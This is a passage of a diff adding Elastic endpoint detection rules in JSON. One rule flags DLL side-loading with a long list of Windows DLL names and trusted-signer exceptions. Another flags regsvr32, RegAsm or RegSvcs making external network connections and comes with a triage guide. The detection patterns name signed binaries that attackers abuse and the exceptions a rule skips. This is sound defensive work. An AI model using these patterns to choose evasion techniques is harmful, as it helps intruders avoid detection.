\"sechost.dll\", \"seclogon.dll\", \"secproc.dll\", \"secproc_isv.dll\", \"secproc_ssp.dll\", \"secproc_ssp_isv.dll\", \"secur32.dll\", \"security.dll\", \"semgrps.dll\", \"semgrsvc.dll\", \"sendmail.dll\", \"sens.dll\", \"sensapi.dll\", \"sensorsapi.dll\", \"sensorscpl.dll\", \"sensorservice.dll\", \"sensorsnativeapi.dll\", \"sensorsutilsv2.dll\", \"sensrsvc.dll\", \"serialui.dll\", \"servicinguapi.dll\", \"serwvdrv.dll\", \"sessenv.dll\", \"setbcdlocale.dll\", \"settingmonitor.dll\", \"settingsync.dll\", \"settingsynccore.dll\", \"setupapi.dll\", \"setupcl.dll\", \"setupcln.dll\", \"setupetw.dll\", \"sfc.dll\", \"sfc_os.dll\", \"sgrmenclave.dll\", \"shacct.dll\", \"shacctprofile.dll\", \"sharedpccsp.dll\", \"sharedrealitysvc.dll\", \"sharehost.dll\", \"sharemediacpl.dll\", \"shcore.dll\", \"shdocvw.dll\", \"shell32.dll\", \"shellstyle.dll\", \"shfolder.dll\", \"shgina.dll\", \"shimeng.dll\", \"shimgvw.dll\", \"shlwapi.dll\", \"shpafact.dll\", \"shsetup.dll\", \"shsvcs.dll\", \"shunimpl.dll\", \"shutdownext.dll\", \"shutdownux.dll\", \"shwebsvc.dll\", \"signdrv.dll\", \"simauth.dll\", \"simcfg.dll\", \"skci.dll\", \"slc.dll\", \"slcext.dll\", \"slwga.dll\", \"smartscreenps.dll\", \"smbhelperclass.dll\", \"smbwmiv2.dll\", \"smiengine.dll\", \"smphost.dll\", \"smsroutersvc.dll\", \"sndvolsso.dll\", \"snmpapi.dll\", \"socialapis.dll\", \"softkbd.dll\", \"softpub.dll\", \"sortwindows61.dll\", \"sortwindows62.dll\", \"spacebridge.dll\", \"spacecontrol.dll\", \"spatializerapo.dll\", \"spatialstore.dll\", \"spbcd.dll\", \"speechpal.dll\", \"spfileq.dll\", \"spinf.dll\", \"spmpm.dll\", \"spnet.dll\", \"spoolss.dll\", \"spopk.dll\", \"spp.dll\", \"sppc.dll\", \"sppcext.dll\", \"sppcomapi.dll\", \"sppcommdlg.dll\", \"sppinst.dll\", \"sppnp.dll\", \"sppobjs.dll\", \"sppwinob.dll\", \"sppwmi.dll\", \"spwinsat.dll\", \"spwizeng.dll\", \"spwizimg.dll\", \"spwizres.dll\", \"spwmp.dll\", \"sqlsrv32.dll\", \"sqmapi.dll\", \"srchadmin.dll\", \"srclient.dll\", \"srcore.dll\", \"srevents.dll\", \"srh.dll\", \"srhelper.dll\", \"srm.dll\", \"srmclient.dll\", \"srmlib.dll\", \"srmscan.dll\", \"srmshell.dll\", \"srmstormod.dll\", \"srmtrace.dll\", \"srm_ps.dll\", \"srpapi.dll\", \"srrstr.dll\", \"srumapi.dll\", \"srumsvc.dll\", \"srvcli.dll\", \"srvsvc.dll\", \"srwmi.dll\", \"sscore.dll\", \"sscoreext.dll\", \"ssdm.dll\", \"ssdpapi.dll\", \"ssdpsrv.dll\", \"sspicli.dll\", \"sspisrv.dll\", \"ssshim.dll\", \"sstpsvc.dll\", \"starttiledata.dll\", \"startupscan.dll\", \"stclient.dll\", \"sti.dll\", \"sti_ci.dll\", \"stobject.dll\", \"storageusage.dll\", \"storagewmi.dll\", \"storewuauth.dll\", \"storprop.dll\", \"storsvc.dll\", \"streamci.dll\", \"structuredquery.dll\", \"sud.dll\", \"svf.dll\", \"svsvc.dll\", \"swprv.dll\", \"sxproxy.dll\", \"sxs.dll\", \"sxshared.dll\", \"sxssrv.dll\", \"sxsstore.dll\", \"synccenter.dll\", \"synccontroller.dll\", \"synchostps.dll\", \"syncproxy.dll\", \"syncreg.dll\", \"syncres.dll\", \"syncsettings.dll\", \"syncutil.dll\", \"sysclass.dll\", \"sysfxui.dll\", \"sysmain.dll\", \"sysntfy.dll\", \"syssetup.dll\", \"systemcpl.dll\", \"t2embed.dll\", \"tabbtn.dll\", \"tabbtnex.dll\", \"tabsvc.dll\", \"tapi3.dll\", \"tapi32.dll\", \"tapilua.dll\", \"tapimigplugin.dll\", \"tapiperf.dll\", \"tapisrv.dll\", \"tapisysprep.dll\", \"tapiui.dll\", \"taskapis.dll\", \"taskbarcpl.dll\", \"taskcomp.dll\", \"taskschd.dll\", \"taskschdps.dll\", \"tbauth.dll\", \"tbs.dll\", \"tcbloader.dll\", \"tcpipcfg.dll\", \"tcpmib.dll\", \"tcpmon.dll\", \"tcpmonui.dll\", \"tdh.dll\", \"tdlmigration.dll\", \"tellib.dll\", \"termmgr.dll\", \"termsrv.dll\", \"tetheringclient.dll\", \"tetheringmgr.dll\", \"tetheringservice.dll\", \"tetheringstation.dll\", \"textshaping.dll\", \"themecpl.dll\", \"themeservice.dll\", \"themeui.dll\", \"threadpoolwinrt.dll\", \"thumbcache.dll\", \"timebrokerclient.dll\", \"timebrokerserver.dll\", \"timesync.dll\", \"timesynctask.dll\", \"tlscsp.dll\", \"tokenbinding.dll\", \"tokenbroker.dll\", \"tokenbrokerui.dll\", \"tpmcertresources.dll\", \"tpmcompc.dll\", \"tpmtasks.dll\", \"tpmvsc.dll\", \"tquery.dll\", \"traffic.dll\", \"transportdsa.dll\", \"trie.dll\", \"trkwks.dll\", \"tsbyuv.dll\", \"tscfgwmi.dll\", \"tserrredir.dll\", \"tsf3gip.dll\", \"tsgqec.dll\", \"tsmf.dll\", \"tspkg.dll\", \"tspubwmi.dll\", \"tssessionux.dll\", \"tssrvlic.dll\", \"tsworkspace.dll\", \"ttdloader.dll\", \"ttdplm.dll\", \"ttdrecord.dll\", \"ttdrecordcpu.dll\", \"ttlsauth.dll\", \"ttlscfg.dll\", \"ttlsext.dll\", \"tvratings.dll\", \"twext.dll\", \"twinapi.dll\", \"twinui.dll\", \"txflog.dll\", \"txfw32.dll\", \"tzautoupdate.dll\", \"tzres.dll\", \"tzsyncres.dll\", \"ubpm.dll\", \"ucmhc.dll\", \"ucrtbase.dll\", \"ucrtbase_clr0400.dll\", \"ucrtbase_enclave.dll\", \"udhisapi.dll\", \"udwm.dll\", \"ueficsp.dll\", \"uexfat.dll\", \"ufat.dll\", \"uiamanager.dll\", \"uianimation.dll\", \"uiautomationcore.dll\", \"uicom.dll\", \"uireng.dll\", \"uiribbon.dll\", \"uiribbonres.dll\", \"ulib.dll\", \"umb.dll\", \"umdmxfrm.dll\", \"umpdc.dll\", \"umpnpmgr.dll\", \"umpo-overrides.dll\", \"umpo.dll\", \"umpoext.dll\", \"umpowmi.dll\", \"umrdp.dll\", \"unattend.dll\", \"unenrollhook.dll\", \"unimdmat.dll\", \"uniplat.dll\", \"unistore.dll\", \"untfs.dll\", \"updateagent.dll\", \"updatecsp.dll\", \"updatepolicy.dll\", \"upnp.dll\", \"upnphost.dll\", \"upshared.dll\", \"urefs.dll\", \"urefsv1.dll\", \"ureg.dll\", \"url.dll\", \"urlmon.dll\", \"usbcapi.dll\", \"usbceip.dll\", \"usbmon.dll\", \"usbperf.dll\", \"usbpmapi.dll\", \"usbtask.dll\", \"usbui.dll\", \"user32.dll\", \"usercpl.dll\", \"userdataservice.dll\", \"userdatatimeutil.dll\", \"userenv.dll\", \"userinitext.dll\", \"usermgr.dll\", \"usermgrcli.dll\", \"usermgrproxy.dll\", \"usoapi.dll\", \"usocoreps.dll\", \"usosvc.dll\", \"usp10.dll\", \"ustprov.dll\", \"utcutil.dll\", \"utildll.dll\", \"uudf.dll\", \"uvcmodel.dll\", \"uwfcfgmgmt.dll\", \"uwfcsp.dll\", \"uwfservicingapi.dll\", \"uxinit.dll\", \"uxlib.dll\", \"uxlibres.dll\", \"uxtheme.dll\", \"vac.dll\", \"van.dll\", \"vault.dll\", \"vaultcds.dll\", \"vaultcli.dll\", \"vaultroaming.dll\", \"vaultsvc.dll\", \"vbsapi.dll\", \"vbscript.dll\", \"vbssysprep.dll\", \"vcardparser.dll\", \"vdsbas.dll\", \"vdsdyn.dll\", \"vdsutil.dll\", \"vdsvd.dll\", \"vds_ps.dll\", \"verifier.dll\", \"version.dll\", \"vertdll.dll\", \"vfuprov.dll\", \"vfwwdm32.dll\", \"vhfum.dll\", \"vid.dll\", \"videohandlers.dll\", \"vidreszr.dll\", \"virtdisk.dll\", \"vmbuspipe.dll\", \"vmdevicehost.dll\", \"vmictimeprovider.dll\", \"vmrdvcore.dll\", \"voiprt.dll\", \"vpnike.dll\", \"vpnikeapi.dll\", \"vpnsohdesktop.dll\", \"vpnv2csp.dll\", \"vscmgrps.dll\", \"vssapi.dll\", \"vsstrace.dll\", \"vss_ps.dll\", \"w32time.dll\", \"w32topl.dll\", \"waasassessment.dll\", \"waasmediccapsule.dll\", \"waasmedicps.dll\", \"waasmedicsvc.dll\", \"wabsyncprovider.dll\", \"walletproxy.dll\", \"walletservice.dll\", \"wavemsp.dll\", \"wbemcomn.dll\", \"wbiosrvc.dll\", \"wci.dll\", \"wcimage.dll\", \"wcmapi.dll\", \"wcmcsp.dll\", \"wcmsvc.dll\", \"wcnapi.dll\", \"wcncsvc.dll\", \"wcneapauthproxy.dll\", \"wcneappeerproxy.dll\", \"wcnnetsh.dll\", \"wcnwiz.dll\", \"wc_storage.dll\", \"wdc.dll\", \"wdi.dll\", \"wdigest.dll\", \"wdscore.dll\", \"webauthn.dll\", \"webcamui.dll\", \"webcheck.dll\", \"webclnt.dll\", \"webio.dll\", \"webservices.dll\", \"websocket.dll\", \"wecapi.dll\", \"wecsvc.dll\", \"wephostsvc.dll\", \"wer.dll\", \"werconcpl.dll\", \"wercplsupport.dll\", \"werenc.dll\", \"weretw.dll\", \"wersvc.dll\", \"werui.dll\", \"wevtapi.dll\", \"wevtfwd.dll\", \"wevtsvc.dll\", \"wfapigp.dll\", \"wfdprov.dll\", \"wfdsconmgr.dll\", \"wfdsconmgrsvc.dll\", \"wfhc.dll\", \"whealogr.dll\", \"whhelper.dll\", \"wiaaut.dll\", \"wiadefui.dll\", \"wiadss.dll\", \"wiarpc.dll\", \"wiascanprofiles.dll\", \"wiaservc.dll\", \"wiashext.dll\", \"wiatrace.dll\", \"wificloudstore.dll\", \"wificonfigsp.dll\", \"wifidisplay.dll\", \"wimgapi.dll\", \"win32spl.dll\", \"win32u.dll\", \"winbio.dll\", \"winbiodatamodel.dll\", \"winbioext.dll\", \"winbrand.dll\", \"wincorlib.dll\", \"wincredprovider.dll\", \"wincredui.dll\", \"windowmanagement.dll\", \"windowscodecs.dll\", \"windowscodecsext.dll\", \"windowscodecsraw.dll\", \"windowsiotcsp.dll\", \"windowslivelogin.dll\", \"winethc.dll\", \"winhttp.dll\", \"winhttpcom.dll\", \"winhvemulation.dll\", \"winhvplatform.dll\", \"wininet.dll\", \"wininetlui.dll\", \"wininitext.dll\", \"winipcfile.dll\", \"winipcsecproc.dll\", \"winipsec.dll\", \"winlangdb.dll\", \"winlogonext.dll\", \"winmde.dll\", \"winml.dll\", \"winmm.dll\", \"winmmbase.dll\", \"winmsipc.dll\", \"winnlsres.dll\", \"winnsi.dll\", \"winreagent.dll\", \"winrnr.dll\", \"winrscmd.dll\", \"winrsmgr.dll\", \"winrssrv.dll\", \"winrttracing.dll\", \"winsatapi.dll\", \"winscard.dll\", \"winsetupui.dll\", \"winshfhc.dll\", \"winsku.dll\", \"winsockhc.dll\", \"winsqlite3.dll\", \"winsrpc.dll\", \"winsrv.dll\", \"winsrvext.dll\", \"winsta.dll\", \"winsync.dll\", \"winsyncmetastore.dll\", \"winsyncproviders.dll\", \"wintrust.dll\", \"wintypes.dll\", \"winusb.dll\", \"wirednetworkcsp.dll\", \"wisp.dll\", \"wkscli.dll\", \"wkspbrokerax.dll\", \"wksprtps.dll\", \"wkssvc.dll\", \"wlanapi.dll\", \"wlancfg.dll\", \"wlanconn.dll\", \"wlandlg.dll\", \"wlangpui.dll\", \"wlanhc.dll\", \"wlanhlp.dll\", \"wlanmediamanager.dll\", \"wlanmm.dll\", \"wlanmsm.dll\", \"wlanpref.dll\", \"wlanradiomanager.dll\", \"wlansec.dll\", \"wlansvc.dll\", \"wlansvcpal.dll\", \"wlanui.dll\", \"wlanutil.dll\", \"wldap32.dll\", \"wldp.dll\", \"wlgpclnt.dll\", \"wlidcli.dll\", \"wlidcredprov.dll\", \"wlidfdp.dll\", \"wlidnsp.dll\", \"wlidprov.dll\", \"wlidres.dll\", \"wlidsvc.dll\", \"wmadmod.dll\", \"wmadmoe.dll\", \"wmalfxgfxdsp.dll\", \"wmasf.dll\", \"wmcodecdspps.dll\", \"wmdmlog.dll\", \"wmdmps.dll\", \"wmdrmsdk.dll\", \"wmerror.dll\", \"wmi.dll\", \"wmiclnt.dll\", \"wmicmiplugin.dll\", \"wmidcom.dll\", \"wmidx.dll\", \"wmiprop.dll\", \"wmitomi.dll\", \"wmnetmgr.dll\", \"wmp.dll\", \"wmpdui.dll\", \"wmpdxm.dll\", \"wmpeffects.dll\", \"wmphoto.dll\", \"wmploc.dll\", \"wmpps.dll\", \"wmpshell.dll\", \"wmsgapi.dll\", \"wmspdmod.dll\", \"wmspdmoe.dll\", \"wmvcore.dll\", \"wmvdecod.dll\", \"wmvdspa.dll\", \"wmvencod.dll\", \"wmvsdecd.dll\", \"wmvsencd.dll\", \"wmvxencd.dll\", \"woftasks.dll\", \"wofutil.dll\", \"wordbreakers.dll\", \"workfoldersgpext.dll\", \"workfoldersres.dll\", \"workfoldersshell.dll\", \"workfolderssvc.dll\", \"wosc.dll\", \"wow64.dll\", \"wow64cpu.dll\", \"wow64win.dll\", \"wpbcreds.dll\", \"wpc.dll\", \"wpcapi.dll\", \"wpcdesktopmonsvc.dll\", \"wpcproxystubs.dll\", \"wpcrefreshtask.dll\", \"wpcwebfilter.dll\", \"wpdbusenum.dll\", \"wpdshext.dll\", \"wpdshserviceobj.dll\", \"wpdsp.dll\", \"wpd_ci.dll\", \"wpnapps.dll\", \"wpnclient.dll\", \"wpncore.dll\", \"wpninprc.dll\", \"wpnprv.dll\", \"wpnservice.dll\", \"wpnsruprov.dll\", \"wpnuserservice.dll\", \"wpportinglibrary.dll\", \"wpprecorderum.dll\", \"wptaskscheduler.dll\", \"wpx.dll\", \"ws2help.dll\", \"ws2_32.dll\", \"wscapi.dll\", \"wscinterop.dll\", \"wscisvif.dll\", \"wsclient.dll\", \"wscproxystub.dll\", \"wscsvc.dll\", \"wsdapi.dll\", \"wsdchngr.dll\", \"wsdprintproxy.dll\", \"wsdproviderutil.dll\", \"wsdscanproxy.dll\", \"wsecedit.dll\", \"wsepno.dll\", \"wshbth.dll\", \"wshcon.dll\", \"wshelper.dll\", \"wshext.dll\", \"wshhyperv.dll\", \"wship6.dll\", \"wshqos.dll\", \"wshrm.dll\", \"wshtcpip.dll\", \"wshunix.dll\", \"wslapi.dll\", \"wsmagent.dll\", \"wsmauto.dll\", \"wsmplpxy.dll\", \"wsmres.dll\", \"wsmsvc.dll\", \"wsmwmipl.dll\", \"wsnmp32.dll\", \"wsock32.dll\", \"wsplib.dll\", \"wsp_fs.dll\", \"wsp_health.dll\", \"wsp_sr.dll\", \"wtsapi32.dll\", \"wuapi.dll\", \"wuaueng.dll\", \"wuceffects.dll\", \"wudfcoinstaller.dll\", \"wudfplatform.dll\", \"wudfsmcclassext.dll\", \"wudfx.dll\", \"wudfx02000.dll\", \"wudriver.dll\", \"wups.dll\", \"wups2.dll\", \"wuuhext.dll\", \"wuuhosdeployment.dll\", \"wvc.dll\", \"wwaapi.dll\", \"wwaext.dll\", \"wwanapi.dll\", \"wwancfg.dll\", \"wwanhc.dll\", \"wwanprotdim.dll\", \"wwanradiomanager.dll\", \"wwansvc.dll\", \"wwapi.dll\", \"xamltilerender.dll\", \"xaudio2_8.dll\", \"xaudio2_9.dll\", \"xblauthmanager.dll\", \"xblgamesave.dll\", \"xblgamesaveext.dll\", \"xblgamesaveproxy.dll\", \"xboxgipsvc.dll\", \"xboxgipsynthetic.dll\", \"xboxnetapisvc.dll\", \"xinput1_4.dll\", \"xinput9_1_0.dll\", \"xinputuap.dll\", \"xmlfilter.dll\", \"xmllite.dll\", \"xmlprovi.dll\", \"xolehlp.dll\", \"xpsgdiconverter.dll\", \"xpsprint.dll\", \"xpspushlayer.dll\", \"xpsrasterservice.dll\", \"xpsservices.dll\", \"xwizards.dll\", \"xwreg.dll\", \"xwtpdui.dll\", \"xwtpw32.dll\", \"zipcontainer.dll\", \"zipfldr.dll\", \"bootsvc.dll\", \"halextintcpsedma.dll\", \"icsvcvss.dll\", \"ieproxydesktop.dll\", \"lsaadt.dll\", \"nlansp_c.dll\", \"nrtapi.dll\", \"opencl.dll\", \"pfclient.dll\", \"pnpdiag.dll\", \"prxyqry.dll\", \"rdpnanotransport.dll\", \"servicingcommon.dll\", \"sortwindows63.dll\", \"sstpcfg.dll\", \"tdhres.dll\", \"umpodev.dll\", \"utcapi.dll\", \"windlp.dll\", \"wow64base.dll\", \"wow64con.dll\", \"blbuires.dll\", \"bpainst.dll\", \"cbclient.dll\", \"certadm.dll\", \"certocm.dll\", \"certpick.dll\", \"csdeployres.dll\", \"dsdeployres.dll\", \"eapa3hst.dll\", \"eapacfg.dll\", \"eapahost.dll\", \"elsext.dll\", \"encdump.dll\", \"escmigplugin.dll\", \"fsclient.dll\", \"fsdeployres.dll\", \"fssminst.dll\", \"fssmres.dll\", \"fssprov.dll\", \"ipamapi.dll\", \"kpssvc.dll\", \"lbfoadminlib.dll\", \"mintdh.dll\", \"mmci.dll\", \"mmcico.dll\", \"mprsnap.dll\", \"mstsmhst.dll\", \"mstsmmc.dll\", \"muxinst.dll\", \"personax.dll\", \"rassfm.dll\", \"rasuser.dll\", \"rdmsinst.dll\", \"rdmsres.dll\", \"rtrfiltr.dll\", \"sacsvr.dll\", \"scrdenrl.dll\", \"sdclient.dll\", \"sharedstartmodel.dll\", \"smsrouter.dll\", \"spwizimg_svr.dll\", \"sqlcecompact40.dll\", \"sqlceoledb40.dll\", \"sqlceqp40.dll\", \"sqlcese40.dll\", \"srvmgrinst.dll\", \"svrmgrnc.dll\", \"tapisnap.dll\", \"tlsbrand.dll\", \"tsec.dll\", \"tsprop.dll\", \"tspubiconhelper.dll\", \"tssdjet.dll\", \"tsuserex.dll\", \"ualapi.dll\", \"ualsvc.dll\", \"umcres.dll\", \"updatehandlers.dll\", \"usocore.dll\", \"vssui.dll\", \"wsbappres.dll\", \"wsbonline.dll\", \"wsmselpl.dll\", \"wsmselrr.dll\", \"xpsfilt.dll\", \"xpsshhdr.dll\"\n ) and\n not (\n (\n dll.name : \"icuuc.dll\" and dll.code_signature.subject_name in (\n \"Valve\", \"Valve Corp.\", \"Avanquest Software (7270356 Canada Inc)\", \"Adobe Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"timeSync.dll\", \"appInfo.dll\") and dll.code_signature.subject_name in (\n \"VMware Inc.\", \"VMware, Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"libcrypto.dll\" and dll.code_signature.subject_name in (\n \"NoMachine S.a.r.l.\", \"Oculus VR, LLC\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"ucrtbase.dll\" and dll.code_signature.subject_name in (\n \"Proofpoint, Inc.\", \"Rapid7 LLC\", \"Eclipse.org Foundation, Inc.\", \"Amazon.com Services LLC\", \"Windows Phone\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"libcrypto.dll\", \"wmi.dll\", \"geolocation.dll\", \"kerberos.dll\") and\n dll.code_signature.subject_name == \"Bitdefender SRL\" and dll.code_signature.trusted == true\n ) or\n (dll.name : \"ICMP.dll\" and dll.code_signature.subject_name == \"Paessler AG\" and dll.code_signature.trusted == true) or\n (dll.name : \"dbghelp.dll\" and dll.code_signature.trusted == true) or\n (dll.name : \"DirectML.dll\" and dll.code_signature.subject_name == \"Adobe Inc.\" and dll.code_signature.trusted == true) or\n (\n dll.path : (\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\dxgi.dll\",\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\wincorlib.dll\",\n \"?:\\\\Windows\\\\dxgi.dll\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fb01d790-9f74-4e76-97dd-b4b0f7bf6435", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + }, + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 103 + }, + "id": "fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_107.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_107.json new file mode 100644 index 00000000000..19fb6ac761d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_107.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary.", + "false_positives": [ + "Security testing may produce events like this. Activity of this kind performed by non-engineers and ordinary users is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Registration Utility", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fb02b8d3-71ee-4af1-bacd-215d23f17efa", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE 